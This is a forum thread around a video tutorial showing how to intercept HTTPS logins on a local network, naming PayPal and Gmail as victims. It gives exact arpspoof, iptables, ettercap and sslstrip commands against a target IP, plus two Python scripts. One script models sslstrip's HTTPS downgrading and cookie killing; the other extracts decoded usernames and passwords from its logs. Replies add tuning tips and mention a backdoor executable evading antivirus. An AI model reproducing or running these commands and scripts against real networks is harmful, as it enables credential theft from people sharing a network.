Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
Download video: http://www.mediafire.com/download.php?ykgjnkyejku
Commands: http://pastebin.com/fd6eadf7
What is this?
This video shows that, even with SSL encryption, it isn't secure. Proof of this is seen by showing a web-based email (Google Mail) & online bank (PayPal) password.
How does this work?
> Performing a 'Man In The Middle' attack, so all the traffic flows through the attacker.
> Picks out HTTP traffic on port 80 and then redirects / forwards the packets onto a different port.
> SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
> ettercap then picks out the username & password.
What do I need?
> sslstrip
> arpspoof
> ettercap
*all in BackTrack 4 Pre Final*
Network Setup:
Targets IP: 192.168.1.6
Gateway : 192.168.1.1
Software
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
Commands:
Code:
kate /etc/ettercap.conf
> *uncomment redir_command_off in the iptables, linux section*
# let the box forward packets, so the target keeps its connectivity while we are in the middle
echo 1 > /proc/sys/net/ipv4/ip_forward
# tell the target (192.168.1.6) that we are the gateway (192.168.1.1)
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
# nat table: send the target's port 80 traffic to sslstrip's default listen port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# ettercap and sslstrip each run in their own terminal
ettercap -T -q -i wlan0
sslstrip -a -k -f
ettercap -T -q -i wlan0
Notes:
You could save the packets instead, and then look through them later, in case ettercap doesn't pick up the information you need!
Video length: 03:55
Capture length: 4:41
Song: 16 Bit Lolitas - Nobody Seems To Care
Blog Post:http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
Forum Post: http://forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html
~g0tmi1k
~ Have you, g0tmi1k? ~
:rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
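For anyone wanting to see what sslstrip is actually doing in the "How does this work?" steps above, here is a small Python model of the rewriting. This is an added example, not code from the video, the pastebin or Moxie's sslstrip itself: https:// links and Location headers in server responses are downgraded to http:// and remembered, the victim's later plain-HTTP request to a remembered URL is fetched upstream over https:// (so the real site still sees a normal SSL session), Secure cookie flags are dropped, and with kill-sessions on (what the -k flag does) the victim's existing cookies are expired so they have to log in again through the stripped channel. The HTML, headers and host names are constructed samples, and the matching rules are simplified compared to the real tool. One caveat if you try this today: a browser that already knows a site as HTTPS-only (HSTS, especially preloaded) never sends the plain http:// request in the first place, so there is nothing to strip.

```python
"""Model of the sslstrip rewriting loop. Added example; all samples are constructed."""
import re
from urllib.parse import urlsplit

# An https:// URL inside HTML or a header value; group 1 is host + path (+ query).
HTTPS_URL = re.compile(r'https://([^\s"\'<>]+)', re.IGNORECASE)
# The Secure attribute of a Set-Cookie header.
SECURE_FLAG = re.compile(r';\s*secure\b', re.IGNORECASE)


def _key(host_path):
    """Normalise host+path so 'www.paypal.com/' and 'www.paypal.com' compare equal."""
    return host_path.split('?', 1)[0].rstrip('/').lower()


class Stripper:
    """What sits on port 10000 behind the iptables REDIRECT in the post (simplified)."""

    def __init__(self, kill_sessions=False):
        self.kill_sessions = kill_sessions   # the -k flag
        self.stripped = set()                # host/path of every URL rewritten to http://

    def _downgrade(self, text):
        def repl(m):
            self.stripped.add(_key(m.group(1)))
            return 'http://' + m.group(1)
        return HTTPS_URL.sub(repl, text)

    def strip_response(self, headers, body):
        """Rewrite a server response on its way back to the victim.

        Returns (headers, body) as the victim's browser will see them: every
        https:// link is now http://, a redirect to https:// is now a redirect
        to http://, and cookies lose their Secure flag so the browser keeps
        sending them over the plaintext side.
        """
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == 'location':
                value = self._downgrade(value)
            elif lname == 'set-cookie':
                value = SECURE_FLAG.sub('', value)
            out[name] = value
        return out, self._downgrade(body)

    def upstream_url(self, victim_url):
        """Map the victim's plain-HTTP request to the URL fetched from the real server.

        Only URLs this instance previously downgraded go upstream over https://;
        anything else was plain HTTP to begin with and is forwarded unchanged.
        """
        p = urlsplit(victim_url)
        if p.scheme == 'http' and _key(p.netloc + p.path) in self.stripped:
            return 'https://' + victim_url[len('http://'):]
        return victim_url

    def expire_cookies(self, cookie_header, domain):
        """The -k behaviour: answer the victim's first request carrying cookies with
        Set-Cookie headers that expire every one of them, so the site shows a login
        page and the credentials travel through the stripped channel.
        Returns the list of Set-Cookie values to send (empty when -k is off)."""
        if not self.kill_sessions:
            return []
        names = [c.split('=', 1)[0].strip() for c in cookie_header.split(';') if '=' in c]
        return ['%s=EXPIRED; Path=/; Domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT'
                % (name, domain) for name in names]


if __name__ == '__main__':
    s = Stripper(kill_sessions=True)
    # Constructed server response (not a capture of PayPal): a login link on https.
    hdrs = {'Content-Type': 'text/html',
            'Set-Cookie': 'sid=abc123; Path=/; Secure; HttpOnly'}
    html = '<a href="https://www.paypal.com/login">Log in</a>'
    hdrs, html = s.strip_response(hdrs, html)
    print(html)                      # link now reads http://www.paypal.com/login
    print(hdrs['Set-Cookie'])        # Secure flag gone
    # The victim clicks the downgraded link; the real site still gets an SSL request.
    print(s.upstream_url('http://www.paypal.com/login'))
    # With -k, cookies the victim presents are killed so it has to log in again.
    print(s.expire_cookies('sid=abc123; lang=en', 'www.paypal.com'))
```

The remembered-URL set is the important part: it is why the victim's browser never notices anything beyond a missing padlock, while the site itself sees a perfectly valid SSL client (the attacker). It is also why a site that checks on its own pages whether they were loaded over SSL, as mentioned further down the thread, can break the illusion.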
Very nice tut - keep up the good work!
Nice tut... one small point - the exe for the backdoor is getting caught by AV as a trojan... grrrrr. It can escape half of the AVs on VirusTotal but .....
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Nice work, thanks for posting.
Great tune to roll with, I was sad when it cut out around halfway into the video but was no big deal. Nice Video and thanks again for sharing it for others.
15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
1000HE EEE 30 gig SSD 2 gigs Ram
kazalku,
Thanks! But I'm not using SBD this time around! Plus I don't have any AV running on my target's PC!
evanuz,
I use:
Code:
sslstrip -a -k -f --write /root/output-ssl
You can then do
Code:
kate /root/output-ssl
OR
less /root/output-ssl
OR
grep [username] /root/output-ssl
freemymind,
Thanks for the thanks!
The music cuts out!? :O *goes and checks*
Edit:
Yup - music was missing half way! Re-uploaded (blip.tv and mediafire - links updated!)
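Following on from the grep suggestion above (an added example, not from g0tmi1k's post or from sslstrip): a plain grep for the e-mail address you typed can miss it, because the form body sslstrip writes with --write is URL-encoded (alice@example.org is logged as alice%40example.org, spaces as + and so on). The script below walks the output file, decodes each POST body and pulls out the fields that look like credentials. The sample log is constructed, and the header-line format is an assumption based on how sslstrip's logging writes a timestamp, "POST Data (host):" and then the form body; check one line of your own output file and adjust POST_HEADER if your version differs.

```python
"""Pull decoded credentials out of an sslstrip --write log. Added example; the log is constructed."""
import re
from urllib.parse import parse_qs

# Constructed sample in the shape of an sslstrip output file (assumed format, not a real
# capture): a timestamped "[SECURE] POST Data (host):" line, then the URL-encoded body.
SAMPLE_LOG = """\
2009-07-20 21:15:03,412 SECURE POST Data (www.paypal.com):
login_email=alice%40example.org&login_password=P%40ss%21word&submit.x=Log+In

2009-07-20 21:16:44,001 POST Data (www.example.com):
q=weather+london

2009-07-20 21:17:10,938 SECURE POST Data (www.google.com):
Email=alice&Passwd=hunter2&signIn=Sign+in
"""

# "SECURE" marks a POST sslstrip sent upstream over SSL, i.e. a stripped one.
POST_HEADER = re.compile(r'^(\S+ \S+) (SECURE )?POST Data \(([^)]+)\):$')
# Field names worth looking at; extend for the sites you are testing against.
CRED_FIELDS = re.compile(r'(pass|pwd|email|user|login)', re.IGNORECASE)


def parse_posts(text):
    """Return a list of (timestamp, host, was_stripped, fields) for every POST in the log.

    The body runs until a blank line or the next header; fields are URL-decoded,
    so grep-defeating encodings like %40 come out as the characters the victim typed.
    """
    lines = text.splitlines()
    posts, i = [], 0
    while i < len(lines):
        m = POST_HEADER.match(lines[i])
        if not m:
            i += 1
            continue
        body, i = [], i + 1
        while i < len(lines) and lines[i].strip() and not POST_HEADER.match(lines[i]):
            body.append(lines[i])
            i += 1
        fields = parse_qs('&'.join(body), keep_blank_values=True)
        posts.append((m.group(1), m.group(3), m.group(2) is not None,
                      {k: v[0] for k, v in fields.items()}))
    return posts


def find_credentials(text):
    """Keep only posts carrying a credential-looking field: (host, was_stripped, creds)."""
    hits = []
    for _ts, host, stripped, fields in parse_posts(text):
        creds = {k: v for k, v in fields.items() if CRED_FIELDS.search(k)}
        if creds:
            hits.append((host, stripped, creds))
    return hits


if __name__ == '__main__':
    for host, stripped, creds in find_credentials(SAMPLE_LOG):
        print('%s (%s): %s' % (host, 'stripped SSL' if stripped else 'plain HTTP', creds))
```

Run it as python3 script.py after swapping SAMPLE_LOG for open('/root/output-ssl').read(); the output is one line per login form, with the host and the decoded username/password fields.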
Great tutorial and tool, but I had a few problems. I was able to get everything up and running no problem using the BT4 pre-release, but the experience for the user on the target PC was not very seamless.
While testing, I noticed that my target box was taking much longer to load sites (some didn't load at all). Many of the sites would hang with only half the page loaded and in some cases just time out completely.
The attack was working and I was seeing my passwords in plaintext, but I couldn't get it so that the target machine seemed unchanged. In many attempts I would log into my Gmail account, but would never make it to my inbox. It would just hang or take me back to the login screen.
Anyone else have this problem?
Some websites check on the client side whether you are in SSL or not, which would be conducive to your issue here. Try proxying with a proper SSL proxy (ettercap has one) - you will get the self signed warning, but will probably succeed in testing your account.
I use a similar attack when the audit team requests access to particular information about a users browsing habits, it's good to be able to watch their ssl proxy usage sometimes.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
When SSLstrip 0.2 came out I got a copy from Moxie and wrote a tut here. Even put it on a rogue AP. Props to "DarkOperator" for that script. It was so slow we talked about porting it to C. This was not on pre though, just BT4 beta. Is SSLstrip (not on a rogue AP) still ULTRA slow?
Onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
Ya, I did a write-up of running it under airbase... it's not really a prob with sslstrip but more an airbase limitation, as you can't set the MTU size on the Alfa card. Other cards should work however.
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.